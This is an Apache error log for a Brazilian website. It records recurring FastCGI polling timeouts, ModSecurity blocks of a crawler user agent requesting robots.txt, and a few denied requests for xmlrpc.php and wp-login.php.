[Sun Mar 15 17:50:55.974196 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.228.16:35734] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcbr9SswJuvopo3lOgPKAAAAJM"]
[Sun Mar 15 17:51:03.121784 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:51:24.129844 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43528] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:51:45.129087 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:43904] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:52:06.161790 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44244] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:52:28.123394 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44588] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:52:50.125832 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44916] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:53:11.130229 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45272] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:53:35.139385 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:53:57.121215 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46026] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:54:18.135121 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:46408] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:54:39.581815 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46702] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:55:01.129798 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46992] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 17:56:06.242111 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.228.16:42544] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcc5pqj1wV0Si-OkeeOfgAAAAU"]
[Sun Mar 15 17:59:46.908534 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.244.31:36264] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcdwnbQATo66fKoS7zz_gAAAMY"]
[Sun Mar 15 18:00:02.251135 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 45.227.253.15:53010] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:00:24.121874 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50986] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:00:46.125243 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51300] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:01:07.125843 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51658] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:01:28.122206 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51942] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:01:33.185796 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.228.16:47332] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abceLXjZBu2q05ozVU__AQAAAUk"]
[Sun Mar 15 18:01:49.129800 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52218] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:02:10.138095 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:52526] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:02:32.080055 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52850] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:02:53.129812 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53164] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:03:14.134361 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53408] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:03:35.133812 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:53712] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:03:56.138346 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53986] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:04:17.123023 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:54288] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:04:38.122003 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54584] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:04:59.125850 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54856] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:05:10.971828 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.244.31:46484] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcfBtSswJuvopo3lOgRQwAAAJc"]
[Sun Mar 15 18:05:22.681163 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55174] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:05:46.129832 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55490] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:06:09.126004 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55826] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:06:30.045817 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56144] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:06:42.760866 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.228.16:39036] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcfYglT9VtDQc7bgUw_YAAAAQY"]
[Sun Mar 15 18:06:52.125866 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56462] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:07:14.148804 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56806] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:07:35.033819 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57080] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:07:56.061812 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57400] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:08:17.137691 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57780] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:08:39.133845 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58122] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:09:00.149784 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58410] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:09:21.036820 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58670] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:09:42.145901 2026] [proxy_fcgi:error] [pid 32654:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58930] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:10:03.125822 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59278] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:10:21.994641 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.244.31:51430] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcgPdSswJuvopo3lOgSOAAAAJE"]
[Sun Mar 15 18:10:30.129785 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59708] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:10:52.149807 2026] [proxy_fcgi:error] [pid 32654:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59998] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:11:13.131470 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60298] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:11:34.045825 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60678] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:11:55.118214 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:32786] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:12:08.086430 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.228.16:51746] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcgqAlT9VtDQc7bgUxAVAAAARQ"]
[Sun Mar 15 18:12:17.126621 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33110] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:12:38.066528 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33464] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:13:00.129791 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33850] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:13:21.125803 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34208] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:13:43.204902 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34634] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:14:04.130139 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34990] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:14:25.145996 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35262] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:14:47.125085 2026] [proxy_fcgi:error] [pid 32654:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35684] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:15:08.149913 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:36014] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:15:30.205814 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36310] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:15:47.231235 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.244.31:47630] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abchg5qj1wV0Si-OkeeRogAAABY"]
[Sun Mar 15 18:15:52.045824 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36690] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:16:13.132137 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37056] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:16:34.133778 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37382] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:16:58.097892 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37698] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:17:14.848353 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.228.16:37034] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abch2tSswJuvopo3lOgS-wAAAI8"]
[Sun Mar 15 18:17:20.118407 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38000] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:17:46.097872 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38406] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:18:07.125816 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38810] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:18:25.561680 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.228.16:37702] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abciIbABkC4fWIHEf8GYugAAAEs"]
[Sun Mar 15 18:18:28.119264 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39158] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:18:49.129800 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39382] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:19:10.126557 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:39576] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:19:31.117838 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39776] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:19:52.132260 2026] [proxy_fcgi:error] [pid 32654:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:40046] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:20:13.141800 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40232] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:20:35.123781 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40488] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:20:55.895173 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.244.31:34524] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcit3jZBu2q05ozVU8BpwAAAUI"]
[Sun Mar 15 18:20:56.125786 2026] [proxy_fcgi:error] [pid 32654:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40698] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:21:14.667121 2026] [mime_magic:error] [pid 21946:tid 140411624429312] (70014)End of file found: [client 66.249.74.169:60428] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Sun Mar 15 18:21:17.057960 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40856] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:21:38.121811 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41104] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:21:59.137799 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:41462] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:22:20.589801 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41748] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:22:38.275490 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.228.16:57414] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcjHrABkC4fWIHEf8GZJgAAAEM"]
[Sun Mar 15 18:22:42.129794 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:42022] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:23:09.124034 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42394] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:23:31.128058 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42646] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:23:52.131377 2026] [proxy_fcgi:error] [pid 32654:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42840] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:24:14.129846 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:43038] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:24:35.125817 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43292] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:24:56.129797 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43516] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:25:16.558042 2026] [mime_magic:error] [pid 21806:tid 140411658000128] (70014)End of file found: [client 162.144.233.59:58332] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Sun Mar 15 18:25:18.077795 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:43802] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:25:19.301916 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] [client 162.144.233.59:58434] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Sun Mar 15 18:25:40.117592 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44084] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:26:01.133769 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44366] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:26:19.048656 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.244.31:52776] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcj-5qj1wV0Si-OkeeSsgAAAAg"]
[Sun Mar 15 18:26:26.125815 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44576] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:26:47.141793 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44882] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:27:08.132211 2026] [proxy_fcgi:error] [pid 32654:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:45070] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:27:29.121699 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:27:51.153887 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45498] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:28:12.105811 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45766] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:28:33.053818 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45926] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:28:54.121277 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46090] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:29:21.057829 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46300] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:29:42.057857 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46468] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:30:03.125816 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46672] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:30:25.117821 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:46916] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:30:47.076929 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47148] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:31:08.054185 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47330] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:31:31.125776 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47542] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:31:52.125813 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47768] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:31:59.011837 2026] [access_compat:error] [pid 21946:tid 140411540502272] [client 102.219.155.27:23922] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Sun Mar 15 18:32:13.123793 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47916] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:32:34.070630 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48078] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:32:55.037823 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48412] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:33:17.133775 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48646] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:33:38.125967 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48750] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:33:59.073906 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48976] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:34:20.124067 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:49306] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:34:44.121785 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49470] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:35:05.113633 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49652] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:35:27.045861 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49904] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:35:49.045830 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50098] AH01075: Error dispatching request to : (polling)
